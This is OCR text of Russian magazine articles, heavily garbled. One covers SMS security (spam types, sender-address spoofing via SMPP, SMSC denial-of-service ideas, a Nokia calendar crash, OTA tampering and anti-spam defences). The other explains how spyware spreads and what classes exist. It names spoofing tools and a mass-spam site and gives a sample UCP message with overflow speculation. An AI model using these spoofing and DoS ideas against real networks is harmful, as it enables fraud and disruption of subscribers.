™ 15 МИЛЛИОНОВ МОБИЛЬНЫХ АБОНЕНТОВ; 


—_ В СРЕДНЕМ 2 СООБЩЕНИЯ СПАМА 
В НЕДЕЛЮ ОДНОМУ АБОНЕНТУ; 


™ 5% НЕДОВОЛЬНЫХ КЛИЕНТОВ ЗВОНЯТ 
В ЦЕНТР ОБСЛУЖИВАНИЯ АБОНЕНТОВ 
ОДИН РАЗ В МЕСЯЦ; 


“~ СТОИМОСТЬ ОБРАБОТКИ ОДНОГО 
ТАКОГО ЗВОНКА СОСТАВЛЯЕТ 
7 ДОЛЛАРОВ США. 


При указанных исходных условиях ежегодные пря- 
мые потери оператора связи составят в итоге... 63 
миллиона долларов! А ведь это только прямые 
расходы, не учитывающие уход абонентов к конку- 
рентам, удар по репутации и т.д. Специалисты вы- 
деляют 4 типа SMS-cnama: 


— SPAMMING — ПОЛУЧЕНИЕ ОДНОГО 
ИЛИ НЕСКОЛЬКИХ НЕЖДАННЫХ 
СООБЩЕНИЙ. ПОЛЬЗОВАТЕЛИ, 
ПРИВЫКШИЕ К ЗАСОРЕНИЮ СВОИХ 
ПОЧТОВЫХ ЯЩИКОВ И НЕ 
ОБРАЩАЮЩИЕ НИКАКОГО ВНИМАНИЯ 
НА ПРИГЛАШЕНИЯ КУПИТЬ «ВИАГРУ» 
СО СКИДКОЙ ИЛИ ПОСЕТИТЬ 
УНИКАЛЬНЫЙ СЕМИНАР, С ЛЕГКОСТЬЮ 
ОТЗЫВАЮТСЯ НА СИГНАЛ МОБИЛЬНОГО 
ТЕЛЕФОНА «ВАМ ПРИШЛО СООБЩЕНИЕ. 
ПРОЧИТАТЬ? ». ТЕМ БОЛЕЕ ЧТО, 
В ОТЛИЧИЕ ОТ ЭЛЕКТРОННОЙ ПОЧТЫ, 
НА ЭКРАНЕ МОБИЛЬНОГО ТЕЛЕФОНА 
ПРОСТО НЕТ МЕСТА, ЧТОБЫ СРАЗУ 
ВЫСВЕТИТЬ АДРЕС ОТПРАВИТЕЛЯ 
SMS’KU. А ЭТО ВЫНУЖДАЕТ 
ПОЛЬЗОВАТЕЛЯ ОТКРЫВАТЬ 
ПРИШЕДШЕЕ СООБЩЕНИЕ. И ХОТЯ РЯД 
ТЕЛЕФОНОВ (НАПРИМЕР, MOTOROLA) 
ОБЛАДАЕТ ФУНКЦИЕЙ AUTOREAD, 
ЭТО ВСЕ РАВНО НЕ СНИМАЕТ 
ПРОБЛЕМЫ НЕДОВОЛЬСТВА 
НЕПРОШЕННЫМИ СООБЩЕНИЯМИ. 
И НЕ СТОИТ СБРАСЫВАТЬ СО СЧЕТОВ, 
ЧТО, НАПРИМЕР, В США SMS 
ОПЛАЧИВАЮТСЯ КАК ОТПРАВИТЕЛЕМ, 
ТАК И ПОЛУЧАТЕЛЕМ. 


— FLOODING — ПОЛУЧЕНИЕ ОГРОМНОГО 
ПОТОКА $М$-СООБЩЕНИЙ 
С РАЗЛИЧНЫМИ АДРЕСАМИ 
ОТПРАВИТЕЛЕЙ. В ЭТОМ 
И ПРЕДЫДУЩЕМ СЛУЧАЯХ ОПЕРАТОР 
ИМЕЕТ КОНТРАКТ С ПОСТАВЩИКОМ 
КОНТЕНТА, И ПРИ ЭТОМ ЗА ОТКАЗ ОТ 
ПРИНЯТИЯ $М$ ОПЕРАТОР-ПОЛУЧАТЕЛЬ 
ПЛАТИТ ШТРАФ, А ТАКЖЕ МОЖЕТ БЫТЬ 
ОБВИНЕН В РАССЫЛКЕ СПАМА. 


—` FAKING — SMS ПОСЫЛАЕТСЯ 
С ПОДСТАВНОГО АДРЕСА SMS-LIEHTPA. 
В ЭТОМ СЛУЧАЕ ОПЕРАТОР-ПОЛУЧАТЕЛЬ 
НЕ В СОСТОЯНИИ ВЫСТАВИТЬ 


ПРАВИЛЬНЫЙ СЧЕТ И ВЫНУЖДЕН 
ПЛАТИТЬ «ИЗ СВОЕГО КАРМАНА». 


— SPOOFING — СПАМ СОДЕРЖИТ 
ПОДМЕННЫЙ АДРЕС $М$-ИСТОЧНИКА, 
ЧТО ПРИВОДИТ К ПОДКЛЮЧЕНИЮ 
К РОУМИНГУ И ПОТЕРЕ ДЕНЕГ СО 
СТОРОНЫ ОПЕРАТОРА ИЛИ, В ХУДШЕМ 
СЛУЧАЕ, СО СТОРОНЫ 
ПОДСТАВЛЕННОГО АБОНЕНТА. 


Легко ли осуществить подмену адресов в $М$-со- 
общении? Элементарно. Во-первых, это можно 
сделать через меб-шлюз. Во-вторых, сами прото- 
колы взаимодействия с SMSC не очень защищены 
от подделки, например, уже не раз упомянутый 
протокол SMPP. Передача коротких сообщений в 
рамках SMPP осуществляется с помощью пакетов, 
называемых PDU (protocol data units). Тело данных 
РОУ может выглядеть следующим образом: 


Злоумышленнику не составляет большого труда 
модифицировать поле source_addr и тем самым 
подменить адрес отправителя сообщения. Подме- 
нить адрес центра SMSC сложнее, но тоже возмож- 
но. Особенно учитывая, что операторы редко зани- 
маются защитой OKC7, и многим компаниям, кото- 
рые предлагают расширенные сервисы, предлага- 
ется прямой доступ к OKC7. A Tak как они часто име- 
ют интерфейс и в интернете, то вероятность осуще- 
ствить какую-нибудь гадость только возрастает. 
Если нет желания заниматься «ручной» рабо- 
той, то можно воспользоваться либо готовыми ути- 
литами (кстати, их можно легко написать самим — 
библиотека для работы с SMPP входит, например, 
в Delphi), либо поискать на просторах Сети соответ- 
ствующие ресурсы. Уже на первой странице резуль- 
татов поиска Google ты наверняка найдешь ссылку 
на утилиту SMS Spoof для Palm OS (она позволяет 
посылать сфальсифицированные сообщения по 
протоколу EMI/UCP) и сайт www.smsspoofing.com, ко- 
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торый позволяет рассылать сфальсифицированные 
SMS в массовом масштабе (оплата организуется 
через PayPal, зона охвата — 170 стран). 

Для борьбы с этой напастью подойдут сле- 
дующие способы: 


™ ЗВОНОК АБОНЕНТА, ПОЛУЧИВШЕГО 
СПАМ, В СЛУЖБУ ПОДДЕРЖКИ. 
НО В РОССИИ ЭТО ПРАКТИЧЕСКИ 
НЕ РАБОТАЕТ. 


“~ БЛОКИРОВАНИЕ АДРЕСА HA SMSC 
ИЛИ STP С ПОМОЩЬЮ БЕЛОГО 
И ЧЕРНОГО СПИСКА 
АВТОРИЗОВАННЫХ/НЕАВТОРИЗОВАННЫ 
Х УДАЛЕННЫХ «ПОСЛАНЦЕВ» 
(КАК ESME, ТАК И МАР/ЗССР-АДРЕСОВ). 


—` ФИЛЬТРАЦИЯ СОДЕРЖИМОГО ПО 
КЛЮЧЕВЫМ СЛОВАМ И ДРУГИМ, БОЛЕЕ 
ИНТЕЛЛЕКТУАЛЬНЫМ, СПОСОБАМ. 
НАПРИМЕР, СИСТЕМА SLIMIT-C 
КОМПАНИИ МЕС РАБОТАЕТ 
ПО ПРИНЦИПУ ВЫЯВЛЕНИЯ 
И БЛОКИРОВАНИЯ СООБЩЕНИЙ, 

В КОТОРЫХ ВСТРЕЧАЮТСЯ ССЫЛКИ 
НА САЙТЫ, РЕКЛАМИРУЮЩИЕ ТЕ 

ИЛИ ИНЫЕ ПРОДУКТЫ И УСЛУГИ. БАЗА 
ТАКИХ URL ОБНОВЛЯЕТСЯ ЕЖЕЧАСНО. 


—` КОНТРОЛЬ ПРЕВЫШЕНИЯ ПОРОГОВОГО 
ЧИСЛА $М$-СООБЩЕНИЙ. ПО ТАКОМУ 
ПРИНЦИПУ ДЕЙСТВУЕТ ЯПОНСКАЯ 
КОМПАНИЯ NTT DOCOMO, КОТОРАЯ 
ИСПОЛЬЗУЕТ ДЛЯ БОРЬБЫ СО СПАМОМ 
ПРОСТОЕ ОГРАНИЧЕНИЕ — 

100 СООБЩЕНИЙ В ДЕНЬ ОТ ОДНОГО 
ПОЛЬЗОВАТЕЛЯ. ПРЕВЫШЕНИЕ ЭТОГО 
ЧИСЛА ПРИВОДИТ К ОТКАЗУ 
НАРУШИТЕЛЮ В ОКАЗАНИИ УСЛУГ. 

В BELL CANADA ТАКЖЕ РЕАЛИЗОВАН 
МЕХАНИЗМ БЛОКИРОВАНИЯ ПЕРЕДАЧИ 
ПРИ ПРЕВЫШЕНИИ ОПРЕДЕЛЕННОГО 
ЧИСЛА $МРР-СООБЩЕНИЙ ОТ ESME. 

И, НЕСМОТРЯ НА ТО, ЧТО 
ЕЗМЕ-ПРИЛОЖЕНИЯ МОГУТ 
ГЕНЕРИРОВАТЬ ДО НЕСКОЛЬКИХ СОТЕН 
SMS’OK В СЕКУНДУ, МНОГИЕ КОМПАНИИ 
НЕ ПОЗВОЛЯЮТ ПЕРЕДАВАТЬ СВЫШЕ 
40-50 $М$ В СЕКУНДУ. ПОМИМО ЗАЩИТЫ 
ОТ СПАМА, ТАКОЕ ОГРАНИЧЕНИЕ 
ПОЗВОЛЯЕТ ЗАЩИТИТЬСЯ 

И OT DOS-ATAK, ВЫРАЖЕННЫХ 

В ПОСЫЛКЕ БОЛЬШОГО ПОТОКА 
СООБЩЕНИЙ, НАРУШАЮЩИХ 
РАБОТОСПОСОБНОСТЬ СЕТИ. 


В случае с локальным спамом (в рамках одного 
оператора через протокол SMPP) блокировать его 
можно на уровне $М$-центра, при наличии соот- 
ветствующей возможности. В случае, если сооб- 
щение приходит из сети другого оператора (напри- 
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мер, роумингового), то с его стороны SMS также 
посылается через SMSC, а вот внутри сети получа- 
теля оно проходит через М$С и затем напрямую, 
минуя локальный SMSC, направляется на мобиль- 
ный телефон получателя. Для решения этой зада- 
чи необходимо контролировать OKC7. Причем 
блокировать этот протокол невозможно — без не- 
го нарушится вся работа сети. Необходимо уметь 
фильтровать OKC7. Для реализации этой задачи 
можно использовать интеграцию STP (например, 
Cisco ITP) с внешними антиспамовыми решения- 
ми. К числу таких решений можно отнести Logi- 
caCMG, Openmind Networks, eServ Global или Fer- 
ma SAS (SMS Anti-Spam Screening). 

SAS — это межсетевой экран для фильтрации 
SMS в реальном времени, разрешающий или бло- 
кирующий сообщения, посылаемые или принимае- 
мые любым из абонентов мобильного оператора. В 
качестве критериев отсечения спама используются: 


— КЛЮЧЕВЫЕ СЛОВА; 

— АДРЕС ОТПРАВИТЕЛЯ; 

— IMSI ПОЛУЧАТЕЛЯ; 

— ЧИСЛО ОТПРАВЛЯЕМЫХ АБОНЕНТОМ 
СООБЩЕНИЙ; 

— ЭВРИСТИЧЕСКИЙ АНАЛИЗ; 

— «ЧЕРНЫЙ»/«БЕЛЫЙ» СПИСОК. 


+> mapa фраз о DoS. Первое, что приходит на ум, 
размышляя о SMS DoS'e — это сгенерировать 
огромный поток коротких сообщений, которые дол- 
ЖНЫ «завалить» центр SMSC. Эту тему достаточно 
давно обсуждают специалисты, а после появления в 
ноябре прошлого года статьи «Exploiting Open Fun- 
ctionality in SMS-Capable Cellular Networks» шумиха 
поднялась вновь. Кто-то говорит, что в статье напи- 
сана правда, кто-то утверждает, что это «гнилая 
сенсация», и на практике реализовать описанные в 
статье методы невозможно (или они не сработают). 

Но факт есть факт: посылка большого числа 
сообщений может вызвать определенные пробле- 
мы в работе SMSC. Как минимум потому, что 
SMSC лицензируется по числу сообщений в секун- 
ду, и превышение определенного порога не позво- 
лит SMSC обрабатывать новые сообщения. Можно 
выдвинуть еще одну гипотезу, которую на практи- 
ке не проверяли. Если применить идею атаки «Ping 
of Death» (посылка большого числа перекрываю- 
щихся фрагментов по протоколу ICMP, совокупная 
длина которых превышает максимальный размер 
|Р-пакета в 64 килобайта), то работоспособность 
SMSC может быть также нарушена. И еще одна ги- 
потеза — посылка разбитых на фрагменты «длин- 
ных» 5М$-сообщений, которые будут храниться в 
SMSC, пока он не получит все фрагменты. Если 
одного из фрагментов «по случайности» не хватит, 
и число таких «длинных» SMS'ok будет значитель- 
ным, TO SMSC также может быть выведен из строя. 

Есть также стойкое подозрение, что прото- 
колы для обработки SMS разрабатывались без 
учета требований безопасности, и манипуляция 


полями 5М$-сообщений может привести к пе- 
чальным последствиям. Например, сообщение 
«hello» абоненту с телефоном 66677789 в рамках 
протокола EMI/UCP будет выглядеть следующим об- 
разом: “B01/00045/O/30/66677789///1//////68656CECEF/CE’C. 
Второе поле (00045) определяет длину пакета. 
Если SMSC «доверяет» данному полю и не пере- 
проверяет его, то изменение значения в нем по- 
зволяет реализовать атаку «переполнение буфе- 
ра». Интересный эффект может возникнуть, если 
модифицировать третье поле «тип операции» (О 
— для операции, В — для результата) и четвертое 
поле «операция» (например, 30 — передача сооб- 
щения). Отсутствие «защиты от дурака» может 
привести к нарушению работоспособности SMSC. 

Аналогичные проблемы могут возникнуть с 
телефоном, у которого обычно не хватает «моз- 
гов» на грамотную обработку входящих сообще- 
ний. Например, если определенным образом 
сформировать событие для календаря на некото- 
рых моделях Nokia, то телефон зависает «намер- 
TBO» И «спасти» его можно только полной пере- 
прошивкой. Главное в данной DoS-atake — ука- 
зать несуществующее время, например, 25 часов 
44-го числа 13-го месяца. 

Защититься от перечисленных выше напа- 
стей не способен ни абонент, ни даже оператор. 
Так как вся логика обработки $М$-протоколов 
реализуется внутри мобильного телефона или 
SMSC, то остается только уповать на то, что раз- 
работчики вплотную займутся данной пробле- 
мой. Неумение обрабатывать входные данные и 
недооценка вопросов безопасности может доро- 
го обойтись репутации производителей мобиль- 
ных телефонов. 

Еще один способ нарушить работоспособ- 
ность SMS-cepsuca — организовать классическую 
DoS-ataky на SMSC. Учитывая, что он является 
обычным !Р-приложением, реализовать эту зада- 
чу — дело несложное. Но и защита от таких атак 
не составляет большого труда — можно использо- 
вать как специализированные решения по отра- 
жению DoS и DDoS-atak, так и механизмы обнару- 
жения аномалий в сетевом оборудовании. 

И, конечно же, нельзя забывать про меха- 
низм ОТА, который позволяет удаленно изменять 
любые настройки мобильного телефона. С его по- 
мощью можно изменить адрес SMSC, и злоумы- 
шленник получит доступ ко всей переписке инте- 
ресующего его абонента (разумеется, он должен 
иметь доступ к новому SMSC). А можно сделать 
так, что телефон вообще перестанет куда-либо 
звонить и превратится в красивую игрушку, кото- 
рую так любят маленькие дети. 
> — ЭМ5$-вирусы. О проблеме SMS-sBupycosB мно- 
гие говорят, но мало кто понимает, что это такое. 
По большому счету, $М$-вирусов в их исконном 
понимании не существует. Пока не появилось ни 
одной саморазмножающейся программы, которая 
бы использовала SMS в качестве канала своего 
распространения. Был Cabir, который распростра- 


нялся через Bluetooth, используя дыру в операци- 
онной системе Symbian. Был Duts, был Brador... 
Потом пошла череда троянцев для мобильных 
платформ (как правило, Symbian, изредка Win- 
dows CE/Mobile). Но все это не вирусы. 

Отчасти к разряду вирусов может быть отне- 
сет Comwarrior, который мог распространяться как 
через Bluetooth, так и через MMS, рассылая себя 
по адресной книге, хранящейся в мобильном теле- 
фоне. Но все-таки, к счастью, технология SMS по- 
хоже не способна «родить» настоящий $М$-вирус 
(хотя кто знает, что можно сделать с помощью 
ОТА-механизмов), который бы стал действитель- 
но большой проблемой для мирового сообщества. 
Ведь в отличие от Symbian или функциональности 
MMS, технология SMS поддерживается любым 
мобильным телефоном, даже самым дешевым. 
Однако и без вирусов SMS является большой го- 
ловной болью — спам, DoS ит.д. 
> — бдительны, но беззащитны. Мы рассмотрели 
только один аспект безопасности SMS — переда- 
чу через ESME по сети ОКС7 мобильному абонен- 
ту. Но при этом мы совсем не коснулись такой те- 
мы, как безопасность OKC7, которая также пре- 
доставляет злоумышленникам множество спосо- 
бов совершения преступных компьютерных дей- 
ствий. Мы также не рассмотрели проблему SMS- 
угроз непосредственно с мобильного телефона. 
Например, SMS-cnam может быть реализован 
вручную (хотя массовым его не назовешь) или с 
применением средств автоматизации этого про- 
цесса (специальные скрипты). Но данный вариант 
практически никогда и никем не используется, 
так как в этом случае приходится платить за каж- 
дое отправленное сообщение из своего кармана. 
Другое дело — использование украденного или 
клонированного телефона. И хотя этот вариант не 
такой массовый, как первые два, он тоже очень 
опасен, так как все затраты на его реализацию 
тяжким грузом ложатся на плечи владельца укра- 
денного или фальсифицированного аппарата. К 
сожалению, методов защиты от этой напасти 
немного, и лучший из них — бдительность. 

Мы беззащитны перед $М$-угрозой — мы 
не можем отказаться от приема $М$-сообщений, 
так как наши аппараты не имеют такой возможно- 
сти. Нам приходится уповать на то, что разработ- 
чики мобильных приложений и платформ станут 
более внимательными при создании своих творе- 
ний и не будут наступать на те «грабли», на кото- 
рые разработчики 1Р-приложений наступают уже 
много лет (и наработали определенный опыт 
борьбы с!Р-угрозами). Но, как говорит русская по- 
словица, «на бога надейся, но и сам не плошай». 
Пользователям мобильных телефонов стоит быть 
более бдительными и не спешить нажимать кноп- 
ку «Yes» на вопрос мобильного телефона «Приш- 
ло 5М$-сообщение. Прочитать?» © 


www.smsspoofing.com 
рассылка sms спама по 170 странам 
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Spyware отличается от вирусов и червей отсут- 
ствием механизма саморазмножения. Согласно 
Webroot, 9 из 10 компьютеров, подключенных к ин- 
тернету, инфицированы, и 86% пользователей по- 
несли определенный финансовый ущерб от рабо- 
ты шпионского ПО. А по данным Сайпег, от 20% до 
40% обращений в службу поддержки (собственную 
или оператора связи) связано именно с проблемой 
получения spyware. Хотя часто пользователи даже 
не задумываются о Spyware, перекладывая «ответ- 
ственность» за проблемы с компьютером Ha Micro- 
soft, медленное железо и т.д. Шпионское ПО явля- 
ется реальной проблемой для современного ИТ- 
мира. Кстати, иногда «шпионские» технологии ис- 


шпионские игры 


ВСЯ ПРАВДА О SPYWARE 


SPYWARE — ЭТО НАЗВАНИЕ ЦЕЛОГО КЛАССА ПРОГРАММ, КОТОРЫЕ ПРЕДНАЗНАЧЕНЫ 
ДЛЯ СКРЫТОЙ РАБОТЫ НА КОМПЬЮТЕРЕ ПОЛЬЗОВАТЕЛЕЙ И ВЫПОЛНЕНИЯ РЯДА ЗАДАЧ, 
ТАКИХ КАК СБОР ИНФОРМАЦИИ О ПОСЕЩАЕМЫХ САЙТАХ И ДЕЙСТВИЯХ ПОЛЬЗОВАТЕЛЯ 
НА НИХ, НОМЕРОВ КРЕДИТНЫХ КАРТ, ПАРОЛЕЙ И ДРУГОЙ ЛИЧНОЙ ИНФОРМАЦИИ 


|Алексей Лукацкий 


lalukatsk @ cisco.com| 


пользуются для проверки соблюдения авторских 
прав и интеллектуальной собственности, как, на- 
пример, в Sony Extented Copy Protection. 


как они попадают Ha ТВОЙ компьютер 

1 САМЫЙ ПРОСТОЙ СПОСОБ УСТАНО- 
ВИТЬ SPYWARE НА КОМПЬЮТЕР — NO- 
ПРОСИТЬ СДЕЛАТЬ ЭТО САМОГО ПОЛЬ- 
ЗОВАТЕЛЯ. ЧТО ХАРАКТЕРНО, ПОЛЬЗО- 
ВАТЕЛИ ЧАСТО ЭТО ДЕЛАЮТ, НЕ ЗАДУ- 
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МЫВАЯСЬ О ПОСЛЕДСТВИЯХ. ЖЕЛАЯ 
ПОЛУЧИТЬ «УСКОРИТЕЛЬ ИНТЕРНЕТА» 
ИЛИ СРЕДСТВО ЗАЩИТЫ 

ОТ ВРЕДОНОСНЫХ ПРОГРАММ, 
ПОЛЬЗОВАТЕЛЬ НА ВОПРОС 
«УСТАНОВИТЬ?» ОТВЕЧАЕТ «ДА» 

И СОБСТВЕННОРУЧНО ЗАНОСИТ 

НА КОМПЬЮТЕР ЗАРАЗУ. ТОЛЬКО 
БДИТЕЛЬНОСТЬ ПОМОЖЕТ 
ПРЕДОТВРАТИТЬ ТАКОЙ КАНАЛ 
РАСПРОСТРАНЕНИЯ ПРОГРАММНЫХ 
ШПИОНОВ. 


2 ИНТЕГРАЦИЯ SPYWARE 

С КАКОЙ-ЛИБО ПОЛЕЗНОЙ И НУЖНОЙ 
ПРОГРАММОЙ. ПРАКТИЧЕСКИ ЛЮБАЯ 
FREEWARE ИЛИ SHAREWARE СОДЕРЖИТ 
ВНЕДРЕННЫЙ В НЕЕ КОД, КОТОРЫЙ 
МОЖЕТ ПОКАЗЫВАТЬ РЕКЛАМУ ИЛИ 
ТАЙНО СОБИРАТЬ ИНФОРМАЦИЮ 

О ПОВЕДЕНИИ ПОЛЬЗОВАТЕЛЯ, 
КОТОРАЯ ЗАТЕМ ОТПРАВЛЯЕТСЯ 
РЕКЛАМНЫМ АГЕНТСТВАМ ИЛИ 
АВТОРАМ SPYWARE. ПРИМЕРЫ 
ПРОГРАММ, ДОПОЛНЕНЫХ ШПИОНАМИ: 
DIVX, FLASHGET, EDONKEY 2000, ICQ 
ИТ.П. ИНТЕГРАЦИЯ ШПИОНСКОГО 

ПО С ОБЫЧНОЙ ПРОГРАММОЙ МОЖЕТ 
ПРОИСХОДИТЬ НЕСКОЛЬКИМИ 
СПОСОБАМИ. ПЕРВЫЙ, НЕ САМЫЙ 
РАСПРОСТРАНЕННЫЙ, — SPYWARE 

И ПОЛЕЗНАЯ ПРОГРАММА 
ИНТЕГРИРУЮТСЯ НА УРОВНЕ КОДА. 

В ЭТОМ СЛУЧАЕ УДАЛИТЬ «ШПИОНА» 
НЕ ПРЕДСТАВЛЯЕТСЯ ВОЗМОЖНЫМ 

И МОЖНО ТОЛЬКО ПЫТАТЬСЯ 
ОГРАНИЧИТЬ ЕГО ФУНКЦИОНАЛЬНОСТЬ 
ПУТЕМ БЛОКИРОВАНИЯ ОТСЫЛКИ 
СОБРАННОЙ ИНФОРМАЦИИ, ЗАПУСКА 
POPUP'OB И Т.Д. ВТОРОЙ ВАРИАНТ 
ИНТЕГРАЦИИ — АВТОРЫ SPYWARE 
ПЛАТЯТ РАЗРАБОТЧИКАМ ПОЛЕЗНЫХ 
ПРОГРАММ ЗА ВСТРАИВАНИЕ СВОЕГО 
ВРЕДОНОСНОГО КОДА ВНУТРЬ 
ПРОГРАММЫ. ПРИ СОЗДАНИИ 
ИНСТАЛЛЯТОРА ПРОИСХОДИТ 
ОБЪЕДИНЕНИЕ ДВУХ ПРОГРАММНЫХ 
ПАКЕТОВ, И ПОЛЬЗОВАТЕЛЬ В ИТОГЕ 
ПОЛУЧАЕТ ГОТОВУЮ К УПОТРЕБЛЕНИЮ 
ПОЛЕЗНУЮ ПРОГРАММУ, В КОТОРОЙ 
ПРИТАИЛСЯ ШПИОНСКИЙ ФУНКЦИОНАЛ. 
ТРЕТИЙ ВАРИАНТ — ИНТЕГРАЦИЮ НА 
СЕБЯ БЕРЕТ АВТОР SPYWARE, КОТОРЫЙ 
ВЫКАЧИВАЕТ ИЗ ИНТЕРНЕТА КАКОЕ- 
ЛИБО ЗНАВЕМ/АВЕ/ЕВЕЕМ/АВЕ И САМ 
СОЗДАЕТ ИНСТАЛЛЯТОР, ВКЛЮЧАЮЩИЙ 
СОБСТВЕННОЕ ШПИОНСКОЕ ПО. 


3 НЕСАНКЦИОНИРОВАННОЕ ИЗМЕНЕНИЕ 
НАСТРОЕК WEB-BPAY3EPA, КОТОРЫЕ 
ПОЗВОЛЯЮТ УСТАНОВИТЬ ШПИОНА 

НА КОМПЬЮТЕР ПОЛЬЗОВАТЕЛЯ 


НЕЗАМЕТНО ДЛЯ ЕГО ВЛАДЕЛЬЦА. 

В БОЛЬШИНСТВЕ СЛУЧАЕВ ЭТО 
ДЕЙСТВУЕТ ЧЕРЕЗ INTERNET EXPLORER, 
КАК НАИБОЛЕЕ ЧАСТО ИСПОЛЬЗУЕМЫЙ 
И САМЫЙ ТЕСНО ИНТЕГРИРУЕМЫЙ 

С ОПЕРАЦИОННОЙ СИСТЕМОЙ WINDOWS 
БРАУЗЕР. ДАННЫЙ ВАРИАНТ 
РЕАЛИЗУЕТСЯ ЛИБО ЗА СЧЕТ 
ИСПОЛЬЗОВАНИЯ ДЫР В БРАУЗЕРЕ, 
ЛИБО ЗА СЧЕТ УСТАНОВЛЕННЫХ 

ПО УМОЛЧАНИЮ НАСТРОЕК. 


4 МАСКИРОВКА ПОД ОБНОВЛЯЕМОЕ 
ЧЕРЕЗ ИНТЕРНЕТ ПО. НАПРИМЕР, 
SPYWARE МОЖЕТ МАСКИРОВАТЬСЯ 
ПОД ДИАЛОГОВОЕ ОКНО С ЗАПРОСОМ 
«ВЫ ХОТИТЕ ОПТИМИЗИРОВАТЬ ВАШЕ 
СОЕДИНЕНИЕ С ИНТЕРНЕТОМ?» ИЛИ 
«ВЫ ХОТИТЕ ОБНОВИТЬ ВАШ 
БРАУЗЕР?». НЕЗАВИСИМО ОТ ТВОЕГО 
ОТВЕТА («ДА» ИЛИ «НЕТ») ШПИОН ВСЕ- 
ТАКИ БУДЕТ УСТАНОВЛЕН. ДАННЫЙ 
ВАРИАНТ ЧАСТО ИСПОЛЬЗУЕТ ТАКОЙ 
МЕХАНИЗМ, КАК BROWSER HELPER 
OBJECTS (BHO). ЭТО ОМ. -МОДУЛЬ, 
РАЗРАБОТАННЫЙ ЕЩЕ В 1997 ГОДУ 
КАК ПЛАГИН К INTERNET EXPLORER 

И ПОЗВОЛЯЮЩИЙ РАСШИРЯТЬ ЕГО 
ФУНКЦИОНАЛЬНОСТЬ. 

С ИСПОЛЬЗОВАНИЕМ BHO 
ФУНКЦИОНИРУЮТ ПЛАГИНЫ, 
ПОЗВОЛЯЮЩИЕ ЧИТАТЬ РОРЫ, 

НЕ ЗАГРУЖАЯ ACROBAT READER, 
ИСКАТЬ В СЕТИ С ПОМОЩЬЮ 
YANDEX.TOOLBAR ИЛИ GOOGLE. 
DESKTOP И Т.Д. ЭТОТ МЕХАНИЗМ ЧАСТО 
ИСПОЛЬЗУЕТСЯ И ДЛЯ 
НЕСАНКЦИОНИРОВАННОГО ДОСТУПА 
К КОМПЬЮТЕРУ. НАПРИМЕР, 

С ПОМОЩЬЮ ВРЕДОНОСНОГО 

ПО DOWNLOAD.JECT ЗЛОУМЫШЛЕННИК 
МОЖЕТ ОТСЛЕЖИВАТЬ ДОСТУП 

К ЗАЩИЩЕННЫМ ПО НТТР$ САЙТАМ, 
ПЕРЕХВАТЫВАТЬ ВВОД С КЛАВИАТУРЫ 
(ПАРОЛИ ИЛИ НОМЕР КРЕДИТНОЙ 
КАРТЫ) И ПЕРЕСЫЛАТЬ НА 
ОПРЕДЕЛЕННЫЙ АДРЕС ВСЮ 
СОБРАННУЮ ИНФОРМАЦИЮ. ДРУГИЕ 
«ШПИОНЫ» ТАКЖЕ ИСПОЛЬЗУЮТ 
BROWSER HELPER OBJECTS ДЛЯ СВОИХ 
«ЧЕРНЫХ» ДЕЛ. 


> что они делают. Спектр возможных действий 
на компьютере жертвы очень широк и ограничен 
только фантазией автора. Например, такой класс 
spyware как Dialer изменяет настройки DUN (Dial- 
Up Networking) на номер, который не используется 
пользователем для выхода в интернет, и на кото- 
рый пользователь никогда бы не разрешил звонки 
по причине их дороговизны. Только представь, что 
когда ты спишь, твой компьютер начинает звонить 


по платному номеру на Карибах в службу «секса 
по телефону». Если такой Dialer удачно внедряет- 
ся на компьютер, то пользователь начинает полу- 
чать счета на баснословные суммы. 

Другой пример — отслеживание меб-сайтов, 
посещаемых пользователем. Собранная инфор- 
мация аккумулируется и отсылается либо автору 
шпионского ПО, либо определенным рекламным 
агентствам, которые затем используют получен- 
ные сведения для сфокусированной рекламы. 

Ряд программ (так называемые adware) са- 
ми показывают пользователю всплывающие ре- 
кламные сообщения или перенаправляют его на 
сайты (зачастую независимо от того, что пользо- 
ватель ввел в строке URL), призванные заставить 
обывателя сделать покупку. Если в качестве тако- 
го сайта выступает порнографический ресурс, то 
такое ПО носит название pornware. Аппоумаге — 
это отдельный тип adware, который показывает 
пользователю огромное количество всплываю- 
щих окон даже вне Сети. Наиболее «продвину- 
тые» рекламные шпионы умеют подменять обыч- 
ную рекламу на интернет-ресурсах. И если до 
установки такого adware ты бы увидел рекламу го- 
рящих путевок в Турцию, то уже после его инстал- 
ляции реклама заменяется на порнобаннеры или, 
например, призыв купить жесткий диск большого 
размера. Последнее не является шуткой, если до 
этого пользователь посещал сайты, продающие 
жесткие диски. 

Часто считается, что adware является безо- 
бидным и не наносит ущерба пользователю. Одна- 
ко это не так. Помимо чисто эмоциональной раз- 
дражительности от ненужной рекламы, adware мо- 
жет «забить» полосу пропускания (что особенно ак- 
туально при низкоскоростном выходе в интернет) 
или показывать всплывающие окна с такой часто- 
той, что пользователь не успеет их закрывать — 
в результате компьютер придется перегружать или 
«убивать» процесс Internet Explorer. 

Шпионское ПО (например, CoolWebSearch 
или уже упомянутый Download.ject) может не толь- 
ко собирать информацию о пользователе или по- 
казывать ему рекламу, но и воровать конфиден- 
циальные данные — номера кредитных карт, PIN- 
коды, пароли ит.д. Отдельным классом считаются 
keylogger или «перехватчики клавиатуры», KOTO- 
рые записывают все нажатия клавиш и передают 
их владельцу шпиона. Помимо совершенно беспо- 
лезных данных (например, написание реферата о 
безработице во времена Великой Депрессии в 
США в предвоенные годы) такие перехватчики 
могут записывать пароли, номера кредитных карт, 
РИМ-коды, номера счетов и другую конфиден- 
циальную информацию. 

ПО, носящее название «Hijacker», занимает- 
ся тем, что перехватывает запросы к домашней 
странице пользователя (home раде), к «избранно- 
му», адресам в файле HOSTS, «на лету» перепи- 
сывают результаты работы поисковиков и выпол- 
няют другие аналогичные действия. Например, In- 


ternet Optimizer (он же DyFuCa) переадресует об- 
ращение к странице об ошибке на определенные 
рекламные сайты. 

Достаточно интересен класс шпионов, на- 
зываемых Stealware (или Click fraud, affiliate fraud). 
Эти системы перехватывают «клики» пользова- 
теля и переадресуют их автору spyware (напри- 
мер, 180 Solutions). В результате за «клик» день- 
ги получает именно он, а не рекламируемая на 
кликнутом баннере продукция. И, конечно же, 
многие spyware (тот же CoolWebSearch или Hunt- 
Ваг) используют сразу несколько техник — пере- 
направление трафика, показ рекламы, перехват 
«Кликов» И Т.Д. 
> = особенности обитания и размножения. Не- 
верно думать, что на компьютере существует толь- 
ко один вид spyware. В отличие от вирусов шпион- 
ское ПО может присутствовать на компьютере в 
десятках и сотнях своих разновидностей. Как-то 
на работе запустили антишпионский софт и об- 
